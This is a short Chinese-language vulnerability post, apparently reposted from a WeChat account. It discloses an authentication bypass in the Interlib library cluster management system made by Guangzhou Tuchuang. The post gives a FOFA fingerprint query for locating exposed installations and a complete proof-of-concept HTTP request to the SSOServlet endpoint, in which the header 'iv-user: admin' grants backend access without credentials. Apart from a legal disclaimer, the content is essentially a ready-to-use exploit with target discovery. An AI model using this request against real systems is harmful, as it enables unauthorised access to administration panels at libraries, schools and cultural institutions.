广州图创计算机软件开发有限公司作为文旅行业信息化建设的领导者之一,应用5G、物联网、大数据、AI人工智能等创新技术打造出集咨询服务、产品研发、智能设备、数字资源服务、智慧空间设计、运营策划等为一体的高新技术企业,解决方案被广泛地应用于图书馆、文化馆、高校、中小学、企事业等行业,并投资控股多家文化行业科技企业,实现集团化发展。
广州图创计算机软件开发有限公司图书馆集群管理系统存在逻辑绕过,攻击者可通过此漏洞登录后台,从而造成不良影响。
fofa:
body="广州图创计算机软件开发有限公司"
添加header头部信息iv-user: admin 即可绕过登录。
poc:
GET /interlib/common/SSOServlet? HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
iv-user: admin
Connection: close
小知识
声明
好文推荐
原文始发于微信公众号(丁永博的成长日记):广州图创图书馆集群管理系统存在逻辑绕过
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论